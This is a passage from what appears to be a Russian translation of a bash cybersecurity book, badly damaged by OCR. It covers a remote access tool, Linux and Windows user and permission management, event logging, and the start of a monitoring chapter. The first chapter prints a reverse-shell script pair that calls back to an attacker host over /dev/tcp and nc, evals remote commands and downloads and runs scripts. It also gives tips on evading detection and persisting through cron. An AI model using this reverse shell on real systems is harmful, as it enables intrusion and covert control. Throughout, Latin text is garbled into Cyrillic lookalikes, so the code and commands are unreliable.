Рис. 16.3. Логика инструмента удаленного доступа 


Реализация. Этот инструмент состоит из двух сценариев. Сначала в собственной 
системе злоумышленника выполняется сценарий Ёоса1Ва*. ѕһћ. Он прослушивает 
соединение, созданное вторым сценарием, КетофеКа* .5Н, выполняемым в целевой 
системе. Сценарий Вето%еВа* . ѕћ через сокет ТСР открывает соединение с локаль- 
ной атакующей системой. 


Что происходит дальше? Прослушиватель пс, запущенный в атакующей системе, 
получит от сокета соединение и предоставит удаленное управление атакующей 
системе. Вывод из оболочки Баѕћ, запущенной в скомпрометированной системе, 


238 Часть Ш • Тестирование на проникновение 


начиная с приглашения ввода, появится на экране атакующей системы. Любой 
текст, набранный на клавиатуре в атакующей системе, через ТСР-соединение 
передается программе, запущенной во взломанной системе, то есть Баѕћ. Поэтому 
злоумышленник может вводить любые допустимые команды Баѕћ, и они будут вы- 
полняться в скомпрометированной системе, а полученные результаты (и сообще- 
ния об ошибках) будут передаваться атакующей системе. Это удаленная оболочка, 
которая вызывается в обратном порядке. 


Давайте более подробно рассмотрим операторы, используемые для создания такой 
пары сценариев. В примере 16.1 не только создается прослушиватель, но и ожида- 
ется обратный вызов целевой системы. 


Чтобы избежать обнаружения во время реального теста на проникновение, вы, 
скорее всего, захотите присвоить этим сценариям более универсальные имена. 


Пример 16.1. І осаІВаї.5ћ 
#!/61п/Ба$й - 


# 

# Ваѕһ и кибербезопасность 

# Госа1Ва*. ѕһ 

# 

# Описание: 

# Инструмент удаленного доступа для локальной системы, 
# прослушивает соединение с удаленной системой 

# и помогает с любой запрошенной передачей файла 
# 

# Использование: Госа1Ка+.ѕһ рогЁ1 [рогЕ2 [рог+31] 
# 

# 


# определяем наш демон фоновой передачи файлов 
ФипсЕ1оп 68411ех+ег () 


{ 
мһі1е +гие 
ао 
Е№=$(пс -п1уур ФНОМЕРОКТ2 2>>/&тр/х2.егг) © 
ЇЕ [[ $Е№ == 'ехіЄ' ]] ; ©һеп ехал ; +1 
пс -п1р $НОМЕРОВТЗ < $ЕМ№ [4] 
аопе 
} 
Ж -------------------- ма1п --------------------- 


НОМЕРОВТ=$1 
НОМЕРОКТ2=${2 : -$( (НОМЕРОВТ+1) ) } 
НОМЕРОВТЗ=${3 : -$ ( (НОМЕРОВТ2+1) ) } 
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# инициируем демон фоновой передачи файлов 
БЕЕ11ех+ег & © 


# прослушиваем входящее соединение 
пс -п1ур $НОМЕРОВТ 9 


Сценарий Іоса1Ва+.ѕһ является пассивной или реагирующей на события стороной 
пары сценариев — он ожидает ответа от сценария Вето*евВа* . ѕһ, а затем реагирует 
на них. Сценарии должны общаться через одни и те же порты, поэтому номера, 
указанные в командной строке, в этих сценариях должны совпадать. 


Что же делает сценарий Еоса1Ва*. $1? Вот некоторые ключевые моменты. 
© Сценарий начинается с запуска в фоновом режиме демона передачи файлов. 


Ө Здесь сценарий ожидает входящее соединение от удаленного скрипта. Использова- 
ние команды пс имеет ключевое значение, потому что сетевой файловый дескрип- 
тор БазВ (/4е\м/+ср) не может самостоятельно создать ТСР-соединение. 


Ө Наша функция передачи файлов также начинается с прослушивания, но слуша- 
ется второй номер порта. Нам нужно получить от этого сокета имя файла. 


Ө Еще одно обращение к пс — на этот раз для отправки файла, запрошенного в пре- 
дыдущем сообщении. Это сетевая команда сає — вопрос предоставления файла 
в качестве ввода для команды, подключенной к порту номер три. 


Сценарий в примере 16.2 устанавливает ТСР-соединение с удаленной (целевой) 
системой. 


Пример 16.2. КетоѓеВаї.5ћ 
#1! /61п/Базй - 


# 

# Ваѕһ и кибербезопасность 

# КетофеВа*. ѕһ 

# 

# Описание: 

# Инструмент удаленного доступа для запуска в удаленной системе; 
# в основном передает любые входные данные в оболочку, 

# но если указан !, извлекает и запускает сценарий 

# 

# Использование: КетобеКа+.ѕһ һоѕ&пате рогё1 [рогЕ2 [рог+3]] 
# 


ФипсЕ1оп с1еапир () 


{ 
} 


Рт -Е ФТМРЕГ 
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ФипсЕ1оп гипЅсгірё () 


. # передаем, какой сценарий нам нужен 
есһо "$1" > /аеу/+ср/${НОМЕНО$Т } /${НОМЕРОВТ2 } ө 
# останов 
$1еер 1 [8] 
1+ [[$1 == 'ехії' ]] ; +һеп ехі+ ; +1 
сае > $ТМРЕІ ‹/4еу/+ср/${НОМЕНО$Т} /${НОМЕРОВТЗ} о 
баѕћ $ТМРЕЕ © 
} 
еее МАТМ ------------------- 


# здесь может быть выполнена проверка некоторых ошибок 
НОМЕНОЅТ=$1 

НОМЕРОВТ=$2 

НОМЕРОВТ2=${3 : -$ ( (НОМЕРОВТ+1)) } 

НОМЕРОКТЗ=${4 : -$ ( (НОМЕРОВТ2+1)) } 


ТМРЕЕ=" /+тр/$$. $1" 
{гар с1еапир ЕХІТ 


# звонок домой: 
ехес </4еу/+ср/${НОМЕНО$Т } /${НОМЕРОВТ} 1>8&0 2>&0 [1 


мһі1е +гие 
ао 
есһо -п '$ ' 
геаа -г 
1+ [[ #{КЕРІҮ:0:1} == '!' ]] 
©ћеп 
# это сценарий 
ЕМ№${КЕРІҮ:1} ө 
гипЅсгірё $ЕМ№ 
е1ѕе 
# обычный случай — запустить ста 
еуа1 "ФВЕРЕУ" ө 
+1 
аопе 


ооо 


© Это перенаправление мы встречали раньше, при подключении к ТСР-сокету 
ѕсаіп, ѕёйоиб и $64егг. Обратное подключение к [оса1Ва* . $Н осуществляет команда 
сценария пс, ожидающая это соединение. Что здесь может показаться странным, 
так это встроенная команда ехес. Она обычно используется для запуска вместо 
оболочки другой программы. Если команда не предоставляется (как в данном слу- 
чае), просто устанавливаются все перенаправления и выполнение продолжается 
с новыми соединениями ввода-вывода. С этого момента всякий раз, когда сценарий 
записывает в $40 или з@4етг, запись будет производиться в ТСР-сокет; чтение из 
$6 т будет поступать из сокета. 
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Ө Первый бит вывода представляет собой строку в виде приглашения ввода, чтобы 
пользователь в удаленной системе знал, как начать ввод. Параметр -п не учитывает 
символ новой строки, поэтому это выглядит как приглашение ввода. 


© Оператор геа4 считывает входные данные пользователя (через ТСР-сокет). 
Параметр -г указывает геаа обрабатывать обратный слеш как обычный символ. 
При чтении строки, содержащей обратный слеш, никакая специальная интерпре- 
тация не выполняется. 


© Если первым символом ответа пользователя является восклицательный знак 
(он же Бап5), то (согласно нашему проекту) клиент просит загрузить сценарий. 


© Эта подстрока, начиная с индекса 1 и до конца строки, является ответом без 
восклицательного знака. Мы могли бы встроить ответ в строку вызова функции 
гипѕсгірі и выполнять два отдельных шага. 


Ө В этой строке находится «сердце» сценария. Клиент отправил строку через ТСР- 
сокет, который считывает этот сценарий. Для выполнения команд следует в этой 
строке запустить команду еуа1. Если злоумышленник отправил команду 1$, она 
будет запущена и ее вывод возвратится злоумышленнику. 


Мы запускаем команды внутри этого сценария так, если бы они были его частью. 
На сценарий могут повлиять любые изменения переменных, вносимые этими 
командами. Возможно, лучше иметь отдельный экземпляр оболочки, в которую 
мы будем передавать команды. Но здесь мы использовали более простой подход. 


Ө Когда происходит запрос запуска сценария, вызывается функция гип$сг1ре 
и ее первым действием становится отправка имени сценария обратно в систему 
злоумышленника (где будет находиться сценарий). Перенаправление $406 уста- 
навливает соединение через порт номер два. 


© Задача $1еер — дать время для передачи данных в другую систему и предоста- 
вить этой системе время для реакции и ответа. Возможно, если передача данных 
по сети происходит очень медленно, потребуется увеличить значение $1еер, опре- 
деляющее продолжительность сна. 


© Если на другом конце все прошло хорошо, данное соединение — перенаправле- 
ние (Чт — позволяет подключиться к системе атакующего и содержимое запро- 
шенного сценария становится доступным для чтения из $ т. Мы сохраняем вывод 
во временном файле. 


© Теперь, когда у нас есть файл, мы можем его выполнить с помощью разр. Куда на- 
правляется его вывод? Помните перенаправление, которое мы сделали с опера- 
тором ехес? Поскольку при вызове баѕћ $ТМР ЕТЕЕ мы ничего не перенаправляем, 
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а $40 по-прежнему подключен к порту ТСР, вывод будет отображаться на экране 
компьютера злоумышленника. 


Есть ли другие способы, которыми мы могли бы реализовать такую пару сценари- 
ев? Конечно. Но, рассказав об этой паре сценариев, мы хотели дать вам представ- 
ление о возможностях разв и показать, насколько мощной может быть комбинация, 
как может показаться на первый взгляд, простых шагов. 


Выводы 


Поддержание удаленного доступа к целевой системе — важный шаг во время теста 
на проникновение. Это позволяет вам при необходимости вернуться в целевую сеть. 
Отличительной чертой хорошего инструмента удаленного доступа является то, что 
ваши действия остаются незамеченными. Учитывайте это при выборе метода. 


Описанные методы перестанут работать, если целевая система будет перезагруже- 
на. Для решения этой проблемы необходимо связать их запуск со сценарием входа 
в систему, процессом сгоп или другим механизмом, который будет выполняться 
при загрузке системы. 


В следующей части мы рассмотрим, как командную строку и БазВ можно исполь- 
зовать для администрирования сети и системы обеспечения безопасности. 


Упражнения 


1. Напишите команду для установки обратного канала 55 Н в целевой системе. 
Целевая система должна прослушивать порт 22, и злоумышленник должен 
выполнить обратное подключение, используя локальный порт 1337. ІР-адрес 
системы-злоумышленника — 10.0.0.148, пользователь — гоої. 


2. Зашифруйте Вето+ева* . $П одним из способов, описанных в главе 14. 


Доработайте [оса1Ва* . В так, чтобы он автоматически отправлял серию команд, 
которые выполнялись быв целевой системе в то время, когда Вето{еКа*. ѕһћ 
устанавливает соединение. Список команд можно прочитать из файла в системе 
злоумышленника, а вывод команды можно сохранить в файл в этой же системе. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт Һрѕ://м\м\.гаріасубегорѕ.соту/. 


Часть ІМ 


Администрирование 
систем обеспечения 
безопасности 


Отіх дружественен к пользователям; он 
избирателен к тем, кто называет себя его 
другом. 


Автор неизвестен 


В части ГУ мы рассмотрим, как администраторы могут исполь- 
зовать командную строку для мониторинга и поддержания без- 
опасности своих систем и сетей. 


Пользователи, группы 
и права доступа 


Возможность управления правами доступа пользователей очень важна при обеспе- 
чении безопасности любой системы. Пользователям должны быть предоставлены 
только те права доступа, которые необходимы им для выполнения работы — это 
принцип наименьших привилегий. 


В большинстве случаев для изменения прав доступа потребуется, чтобы вы были 
владельцем файла/каталога или имели права гоої/аатіпіѕігаќог. 


Будьте осторожны при настройке прав доступа к файлам. При изменении прав 
доступа снижается безопасность, а система может потерять свою функциональ- 
ность или стать уязвимой для атаки. 


Используемые команды 


В этой главе мы рассмотрим команды сһтоӣ, сһомп, реЄҒас1, вгоирада, зеФас1, 
иѕегада и иѕегтоаӣ, предназначенные для администрирования систем Глпих. 
Для администрирования \Уіпаоуѕ используются команды ісас1 и пе*. 


сћтоа 


Команда сһтоа применяется для изменения прав доступа к файлам операционной 
системы Ііпих. Она позволяет изменять три типа прав доступа: на чтение (г), за- 
пись (м) и выполнение (х). Полномочия на чтение, запись и выполнение файла 
или каталога могут быть установлены для пользователя (и), группы (в) и других 
пользователей (о). 
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Общие параметры команды 


О -+ — не выводить сообщения об ошибках. 


О -К — рекурсивно изменять файлы и каталоги. 


СПомп 


Команда сһмоп используется в Піпих для изменения владельца файла или каталога. 
Общие параметры команды 


О -+ — не выводить сообщения об ошибках. 


О -К — рекурсивно изменять файлы и каталоги. 


деіғасі 


Команда ве#ас1 отображает список разрешений и управления доступом (АСТ.) 
для файла или каталога Ілпих. 


Общие параметры команды 


О -а — просмотреть предлагаемый по умолчанию список управления доступом. 


О -& — рекурсивно отображать списки управления доступом для всех файлов 
и каталогов. 


дгоирааа 
Команда вгоираай создает в іпих новую группу. 
Общие параметры команды 


-# — выйти, если группа уже существует. 


ѕеіғасі 


Команда зе{+ас1 предназначена для установки файла управления доступом (АСТ.) 
Тлпих или каталога. 


Общие параметры команды 


О -6 — удалить все списки управления доступом. 


О -м — изменить указанные списки управления доступом. 


246 Часть М • Администрирование систем обеспечения безопасности 


О -& — рекурсивно установить списки управления доступом для всех файлов 
и каталогов. 


О -5 — установить указанный список управления доступом. 


О -х — удалить указанный список управления доступом. 


иѕегааа 


Команда иѕегааа применяется для добавления пользователя в іпих. 
Общие параметры команды 


О -2 — добавить в указанную группу нового пользователя. 


О -м — создать домашнюю папку для пользователя. 


иѕегтоа 


Команда иѕегтоа предназначена для изменения в Піпих пользовательских параме- 
тров, таких как местоположение домашнего каталога и группы. 


Общие параметры команды 


О -9-— установить домашний каталог пользователя. 


О -5 — установить группу пользователей. 


ісасіѕ 


Команда 1сас1$ используется для настройки в операционных системах \МУіпаоҳѕ 
списков управления доступом. 


Общие параметры команды 


О /депу — явно запретить указанному пользователю предусмотренные полно- 
мочия. 


О /вгапф — явно разрешить указанному пользователю предусмотренные полно- 
мочия. 


О /гезее — сбросить списки управления доступом к заданным по умолчанию 
полномочиям. 
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пе 


Команда пе в среде \/ш4о\у$ предназначена для управления пользователями, 
группами и другими конфигурациями. 


Общие параметры команды 


О =гоур — параметр команды для добавления или изменения группы. 


О ч5ег — параметр команды для добавления или изменения пользователя. 


Пользователи и группы 


Пользователь — это субъект, которому разрешено управлять определенной систе- 
мой. Группы используются для классификации определенного набора пользовате- 
лей. Группе назначаются права, которые будут применяться ко всем членам группы. 
Это основа управления доступом на ролевой основе. 


Создание пользователей и групп в Мпих 
В Ипах пользователи создаются с помощью команды иѕегааа. Чтобы пользователя 
јѕті+һ добавить в систему, введите следующее: 


5и4о иѕеғааа -т јѕтіһ 


Опция -т позволяет создать для пользователя домашний каталог, что в большин- 
стве случаев приветствуется. Скорее всего, вы также захотите определить для 
пользователя предварительный пароль. Это можно сделать с помощью команды 
раѕѕма, за которой следует имя пользователя: 


5и4о раѕѕма јѕтіһ 
После выполнения этой команды вам будет предложено ввести новый пароль. 


Группы создаются с помощью команды вгоирааа таким же образом: 


5и4о ргоирааа ассоипіпе 


Чтобы убедиться в том, что новая группа успешно создана, просмотрите файл /еїс/ 
вгоцр: 


$ ѕийо егер ассоип1пё /еїс/ргоир 


ассоипіпе :х:1002: 
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Добавить пользователя јѕтієћ в новую учетную группу можно таким образом: 


зи4о иѕегтоа -& ассоипёіпе јѕтіёһћ 


Если вы хотите добавить пользователя јѕтієћ сразу в несколько групп, введите 
команду иѕегтоа с параметрами -а и -6: 


зи4о ичзегтоЯ -а -б6 тагкеёіпе јѕті+һ 


Параметр -а указывает иѕегтоа добавить группу, а параметр -6 определяет группу. 
При использовании параметра -6 можно указать список добавляемых групп, раз- 
делив имена группы запятыми. 


Чтобы просмотреть группы, к которым принадлежит јѕтіЄһ, используйте коман- 
ду вгоирѕ: 


$ ргоирѕ јѕтіЄһ 


јѕтіһ : ассоипіпе тагкетіпе 


Создание пользователей и групп в Міпаомѕ 


Команда пе применяется в \/т4о\з для создания и управления пользователя- 
ми и группами. Чтобы добавить пользователя јѕті+ћ в систему, введите сле- 
дующее: 


$ пе? иѕег јѕті+һ //ааа 


Тһе соттапа сотр1е+еа ѕиссеѕѕ+#и11у. 


Для успешного выполнения команды вам нужно запустить командную строку 
МИпаом или СЁ Вай от имени администратора. При запуске в командной строке 
Ү/іпаомѕ перед командой ааа вам потребуется только один слеш. 


Команду пеї также можно использовать для изменения пароля пользователя. 
Для этого просто введите имя пользователя с паролем, который хотите установить: 


пе изег јѕтіһ ѕотераѕѕма 
Чтобы при запросе пароля \іпіо%жѕ не отображала его на экране, можете заменить 


выводимые символы пароля символами *. Обратите внимание: в СЁ Ваѕћ или 
Сувуіп эта функция должным образом не работает. 


Чтобы просмотреть список пользователей в системе, введите команду пе изег без 
каких-либо дополнительных параметров: 
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$ пе изег 
Озег ассоипёѕ То \\СОМРУТЕВ 


Ат1п15$гафог биеѕї змеи 
Тһе соттапа сотр1ефе ѕиссеѕѕ#и11у. 


Управление группами, связанными с доменом \іпіо%ѕ, осуществляется с по- 
мощью команды пе вгоир. Команда пе 1оса1вгоир предназначена для управле- 
ния локальными системными группами. Чтобы добавить группу под названием 
ассоипёіпе, введите следующее: 


пеЁ 1оса15гоир ассоипёіпе //ааа 


Чтобы добавить пользователя јѕті+ћ в новую учетную группу, напишите: 


пе 1оса15гоир ассоипёіпе јѕтіһ //ааа 


Для подтверждения, что јѕті+һ был добавлен в качестве члена группы, используйте 
команду пеї 1оса1гочр: 


$ пе 1оса1егоир ассоип1т8 


А1іаѕ паме ассоипіпе 
Соттеп+ 


Метбегѕ 


јѕ5тіЁһ 
Тһе соттапа сотр1е+еа ѕиссеѕѕ#и11у. 


Кроме того, команду пе* изег можно использовать для просмотра всех групп, в ко- 
торые входит пользователь јѕтіёпћ, и другой полезной информации: 


$ пе иѕег јѕтіЄһ 


Оѕег паме Эми 

Ри11 Мате 

СоттепЕ 

Оѕег'ѕ соттепе 

Соипїгу/геріоп сое 000 (Ѕуѕ+ет Бефаи1+) 
АссоипЁ асёіхме Үеѕ 

Ассоипе ехрігеѕ №еуег 

Раѕѕмога 1а${ зе 2/26/2015 10:40:17 АМ 
Раѕѕмога ехр1ге$ №еуег 

Раѕѕмога сНапзеаб1е 2/26/2015 10:40:17 АМ 
Раѕѕмога геди1геа Үеѕ 

Оѕег тау сһапре раѕѕмога Үеѕ 

МогКкѕ&а+іопѕ а11омеа А11 


Іовоп ѕсгірі 
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Оѕег рго+11е 
Ноте 91гесфогу 


[аз 1Іороп 12/27/2018 9:47:22 АМ 
Го5оп ћоигѕ а11омеа А11 

Іоса1 бгоир Метбег$В1р$ *ассоипёіпе*Оѕегѕ 
61оБа1 бгоир тетбегѕһірѕ *Мопе 


Тһе соттапа сотр1е+еа ѕиссеѕѕ#и11у. 


Права доступа к файлам 
и списки управления доступом 


После создания пользователей и групп им можно назначить полномочия. Полно- 
мочия определяют, что пользователь или группа может делать в системе, а что — 
не может. 


Права доступа к файлам Мпих 


Пользователям и группам могут быть назначены основные права доступа к файлам 
в пих. Существует три основных вида полномочий: полномочия на чтение (г), 
на запись (м) и на выполнение (х). Команду сһомп можно применять для передачи 
полномочий на использование (владение) файлом от одного пользователя друго- 
му. Например, присвоить права на владение и использование файла герогі.х+ 
пользователю јѕті+һ можно так: 


сһомп јѕтіЄһ герог*. хе 


Команда сһомп также может использоваться для смены владельца группы файла 
герогїі.х+ на ассоиптіпе: 


сһомп :ассоипіпе герогі.х+ 


Следующая команда предоставляет пользователю права на чтение/запись/вы- 
полнение файла, владельцу группы — на чтение/запись файла, а всем другим 
пользователям — на чтение/выполнение файла герогі.+х+: 


сһтоа и=гих , в=гм, о=гх герогі. ёх 


Проще предоставить права с помощью команды сһтоа и восьмеричных значений 
(0—7). Права, предоставленные в предыдущем коде, можно задать следующим об- 
разом: 


сһтоа 765 герогі. хе 
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Восьмеричное число 765 означает определенные права доступа. Каждая цифра 
разбивается на свое двоичное числовое представление, где каждый бит соот- 
ветствует правам на чтение, запись и выполнение. На рис. 17.1 показано, как 
разбивается 765. 


Пользователь Группа Остальные 


1 1 1 1 1 1 1 1 1 
чтение запись выполнение чтение запись выполнение чтение запись выполнение 


Рис. 17.1. Определяем права доступа сһтоа 
в восьмеричной системе счисления 


Двоичный символ 1 в любой позиции указывает, что разрешение предоставлено. 


Вы можете использовать команду веёҒас1 для отображения прав для доступа 
к файлу герог*. хе: 


$ реїҒас1 героге. хе 


# файл: героге. хе 

# владелец: Фзт1 И 

# группа: ассоипёіпе 
иѕег: : гих 

&гоир: : ги- 

офНег:г-х 


Списки управления доступом Глпах. К каталогу или файлу можно применить 
расширенные полномочия, где отдельным пользователям или группам могут быть 
предоставлены определенные права доступа. Как отмечалось ранее, это называется 
списком управления доступом (АСТ.). Списки управления доступом имеют различ- 
ные цели, но обычно используются для предоставления прав доступа приложениям 
или службам при ограничении пользователей. 


Для добавления или удаления полномочий в списках управления доступом можно 
использовать команду ѕеҒас1. Чтобы пользователю ајопеѕ предоставить права на 
чтение/запись/выполнение файла герог* .+х*, напишите следующее: 


5е{ас1 -т и: ајопеѕ:гмх герогф. Ех 


Параметр -т указывает, что в списках управления доступом требуется изменить 
или добавить запись. 
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С помощью команды ве +ас1 можно проверить, что список управления доступом 
был изменен: 


$ реїҒас1 героге. хе 


# файл: герогф. Ех 

# владелец: #ҒѕміЁһћ 

# группа: ассоипіпе 
изег: : гих 

и5ег: ајопеѕ : гих 
ёгоир: : гм- 

та$к: : гмх 

оЕНег:г-х 


Для удаления записи АСТ, добавьте опцию -х: 


зе{Фас1 -х и:ајопеѕ герог{. Ех 


Права доступа к файлам М/пдом$ 


Команда ісас1 в среде \УЛт4о\уз может использоваться для просмотра полномо- 
чий и списков управления доступом к файлу/каталогу и управления ими. Чтобы 
просмотреть текущие права доступа к файлу герог+. ёх, выполните следующие 
действия: 


$ ісас15 герог*. Ех 


герогі.ёхЕ МТ А0ОТНОКІТҮ\ЅҮЅТЕМ: (Е) 
ВОІІТІМ\Аатіпіѕёгаёогѕ: (Е) 


Ѕиссеѕѕ5#и11у рғгосеѕѕеа 1 +11ез; Ғаі1еа ргосеѕѕіпв 9 +11е$ 


В табл. 17.1 перечислены пять простых полномочий для файлов, используемые 
в Міпаохѕ. 


Таблица 17.1. Простые полномочия доступа к файлам МИпаом 


Полномочия Значение 


Е Максимальные (Ри) 
м Изменение (Моаіѓу) 
ВХ Чтение и выполнение (Веа4 ап4 ехесиќе) 


|=] 


Только чтение (Кеаа опу) 


№ Только запись (\/тце оту) 
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Чтобы предоставить пользователю у зт1ЕН права на чтение и запись файла 
герогі.хї, выполните следующие действия. 


$ ісас15 герогі.хї //вгапЕ јѕтіЄһ : гм 
Для проверки полномочий можно повторно использовать команду ісас1: 
$ ісас15 герог*. 4х 
герог{.+хе СОМРИТЕК\- зт1 ЕН: (В, м) 
МТ АЧТНОВТТУ\$У$ТЕМ: (Е) 


ВИТЕТТМ\Адт1п1 $ гафогз : (Е) 


ЅиссеѕѕҒи11у ргосеѕѕеа 1 Ғі1еѕ; Ра11еа ргосез$1п5 0 Ғі1еѕ 


Полномочия М/іпаоуѕ выходят далеко за рамки простых прав доступа к файлам 
и могут предоставить вам гораздо более детальный контроль. Дополнительные 
сведения можно получить в документации по команде ісасіѕ (НЕр://БКЛу/2Н$2СУЦ). 


Внесение массовых изменений 


Теперь, когда вы знаете, как с помощью командной строки изменять права доступа, 
для выполнения более сложных действий можете делать это в сочетании с другими 
командами. Команда #1п4 особенно полезна для массовых изменений прав доступа 
к файлам. 


Например, чтобы найти в текущем рабочем каталоге все файлы, принадлежащие 
пользователю јѕтіёһ, напишите следующее: 


Ғіпа . -фуре + -изег јѕті+һ 


Чтобы найти все файлы в текущей рабочей папке, принадлежащей пользователю 
јѕтіЄһ, и изменить имя владельца этих файлов на им11зоп, введите: 


Ғіпа . -+уре + -изег јѕтіһ -ехес сһомп тм11$0п '{}' \; 


Чтобы найти все файлы в текущем рабочем каталоге, содержащие слово $естей, 
и сделать их доступными только владельцу, введите такие команды: 


Ғіпа . -+уре + -пате '*ѕесге*' -ехес сһтоа 600 '{}' \; 


Эти однострочные команды могут быть полезны во время криминалистического 
анализа при попытке идентифицировать файлы, принадлежащие конкретному 
пользователю, или для защиты файловой системы при развертывании веб-сервера 
и других интернет-систем. 
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Выводы 


Важнейшим аспектом обеспечения безопасности системы является создание поль- 
зователей и пользовательских групп и управление их полномочиями. Старайтесь 
следовать принципу наименьших привилегий и назначать пользователям только 
те права, которые необходимы для выполнения назначенных им заданий. 


В следующей главе мы рассмотрим, как вносить записи в журналы Глпиах и Міпіохѕ, 
чтобы с помощью этих записей фиксировать ошибки и другую полезную инфор- 
мацию. 


Упражнения 


1. Напишите команду Ііпих, которая создаст пользователя тмі1ѕоп с паролем 
павіс. 


Напишите команду Глпах для создания группы пользователей тагке+іпр. 


3. Напишите команду іпих, которая дает группе тагкеёіпе права на чтение/за- 
пись файла роѕ+ег. јре. 


4. Напишите команду Міпаоуѕ для создания пользователя Ғговегѕ с паролем 
пеірһбог һооа. 


5. Напишите команду Міпао%ѕ, которая дает пользователю ёјопеѕ максимальные 
права доступа к файлу Іугісѕ.+х+. 


6. Напишите сценарий Баѕћ для автоматического запуска правильной команды 
иѕег/егоир/регтіѕѕіоп в зависимости от операционной системы, в которой она 
выполняется. Например, пользовательская команда, такая как сгеа+е 1 п, 
автоматически обнаружит ОС и выполнит иѕегада -т јѕті+һ, если это Глпих, 
и пе иѕег јѕтієһ/ /ада, если это Міпаоҹѕ. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт Һрѕ://мму.гарійсубегорѕ.соту/. 


Добавление записей 
в журнал 


При написании сценариев может потребоваться создать в журнале записи для 
важных событий. И Ұіпіо%ѕ, и Глпах предоставляют простые механизмы записи 
в соответствующие системы регистрации. Хорошая запись в журнале имеет сле- 
дующие характеристики. 


о В ней используется согласованная терминология и грамматика. 


О Она предоставляет контекст (указывающий, кто, где и когда). 


О Конкретно описывает, что произошло. 


Используемые команды 


В этой главе мы рассмотрим команды емепёсгеаќе и 1Іорвег. 


еуетсгеае 


Команда еуепсгеа+е используется в среде №іпіомѕ для создания записей в жур- 
нале событий. 


Общие параметры команды 


/а — подробно описать событие. 


/іа — числовой идентификатор события. 


/ѕо — источник события. 


о 
О 
О /1 —– имя журнала событий, в который необходимо внести запись. 
о 
О 


/* — тип события. 


256 Часть М • Администрирование систем обеспечения безопасности 


Іоддег 


Команда 1оррег используется во многих дистрибутивах Глпих для записи событий 
в системный журнал. 


Общие параметры команды 


О -5 — одновременно записать событие в 56 4егг. 


Ц -1 — пометить событие указанным значением. 


Запись событий в журнал М/іпаомѕ 


Команда еуепёсгеаёе предназначена для создания записей в журнале событий 
М/т4о\з. Чтобы ее можно было использовать, необходимо предоставить ей не- 
которые данные. 


О Идентификатор события (/14) — номер для идентификации события. Допусти- 
мо любое число от 1 до 1000. 


О Тип события (/*) — категория, которая наилучшим образом описывает событие. 
Допускаются следующие параметры: 


® ЕККОВ; 
ә МАВМТАС; 

® ТМЕОВМАТТОМ 
ә ЅЏССЕЅЅАЏОІТ; 
® ҒАТ ОКЕАЏОІТ. 


О Имя журнала событий (/1) — имя журнала, в который необходимо внести за- 
пись. Допустимы следующие параметры: 


® ДРРІІСАТІОМ№; 
ө СҮЅТЕМ. 


О Источник события (/50) — имя приложения, генерирующего событие. Допу- 
стима любая строка. 


о Описание (/4) — характеристика события. Допустима любая строка. 


Вот, например, запуск из Сі Ваѕћ: 


$ емепїсгеа+е //10р 200 //Ё АРРЕТСАТТОМ //Т ІМҒОКМАТІОМ //50 "Сурегѕесигі+у 0рѕ" 
//0 "Тһіѕ 1ѕ ап емепЕ" 


Ѕ0ССЕ55: Ап еуепф оф Фуре ' ІМҒОКМАТІОМ№' маѕ сгеа+еа іп {Пе 'АРРЕТСАТТОМ" 
105 міїһ 'Субегзесиг1{у 0рѕ' аѕ Ёһе ѕоигсе. 
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После того как событие записано, можно запустить меуи+і1, чтобы увидеть по- 
следнюю запись в журнале АРРЕТСАТТОМ: 


$ меу+и+і1 де АРРЕТСАТТОМ //с:1 //га:+гие 


<ЕуепЕ хт1пѕ= ' Ир: //ѕсһетаѕ . місгоѕо+Ғ+ . сот/м1п/ 2004/08 /емепёѕ /емепї' > 
<5узфет> 
<Рго\1аег Мате=" Субегѕесигіёу 0рѕ'/> 
<ЕуепЕТО Оца111ег5='0'>200< /Еуеп% ТО» 
<Ее\уе1>4< /1еуе1> 
<Та$К>0</Та$К> 
<Кеумога$>0х80000000000008‹ /Кеумога$> 
<ТітеСгеа+еа 5узфетТ1те='2018-11-30115:32:25.0000000007 ' /> 
<Еуеп{КесогаТ0>120114< / Емеп+Кесогар» 
<Сһаппе1»Арр1ісабіоп</Сһаппе1> 
<Сотрифег>1оса1Но$*</Сотрифег> 
<бесиг1Фу ЦзегТО='$-1-5-21-7325229459-428594289-642442149-1001'/> 
</5узфет> 
<Емепїраїа» 
<Бафа>ТИ1$ 1$ ап емепї</Рраёа> 
</Емеп&рата> 
</Емепё> 


С помощью параметра /$, позволяющего указать имя удаленного хоста или ІР- 
адрес, вы можете записывать события в журналы удаленной системы М№іпао№з. 
Параметр /и применяется для указания имени пользователя в удаленной системе, 
а параметр /р — для указания пароля пользователя. 


Создание журналов Шпих 


Команда 1оввег предназначена для записи событий в системный журнал Глпих. 
Эти события обычно хранятся в файле /маг/10ов/теѕѕавеѕ, но указанный путь мо- 
жет отличаться в зависимости от дистрибутива Глпих. 


Чтобы записать запись в журнал, напишите следующее: 


1орвег 'Тһіѕ 15 ап еумеп*"' 


Вы можете использовать команду +аі1, чтобы увидеть запись сразу после ее фи- 
ксации: 


$ +аі1 -п 1 /маг/1ов/теѕѕареѕ 
М№оу 30 12:07:55 Ка11 гоо: Тһіѕ 15 ап емепі 


Можно записать вывод прямо из команды, передав их в 1оввег. Это может быть 
особенно полезно для сбора выходных данных или сообщений об ошибках, гене- 
рируемых автоматизированными задачами, такими как задания сгоп. 
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Выводы 


Как \/п4о\, так и Глпах предоставляют простые в использовании механизмы за- 
писи сообщений в журнал. Обязательно используйте их для сбора важных событий 
и информации, генерируемых сценариями. 


Далее мы рассмотрим инструмент для мониторинга доступности сетевых устройств. 


Упражнения 


1. Напишите команду для добавления события в журнал событий приложения 
М/п4о\ с идентификатором события 450, типом информации и описанием 
«Упражнение главы 18». 


2. Напишите команду для добавления события «Упражнение главы 18» в журнал 
Тлпих. 


3. Напишите сценарий, который принимает запись журнала в качестве аргумен- 
та и, в зависимости от используемой операционной системы, автоматически 
запускает 1оввег или еуепёсгеаќе. Для определения операционной системы 
используйте файл оѕӣеёес+.ѕћ из примера 2.3. 


Чтобы просмотреть дополнительные ресурсы и получить ответы на эти вопросы, 
зайдите на сайт Һрѕ://ммм.гарійсубегорѕ.сот/. 


Инструмент: мониторинг 
доступности системы 


Одной из важнейших задач любого ГТ-администратора является поддержание 
доступности систем. В этой главе мы создадим сценарий, который использует 
команду ріпе для отправки предупреждения, если указанная система становится 
недоступной. Перечислим требования к этому сценарию: 


О читать файл, содержащий ІР-адреса или имена хостов; 


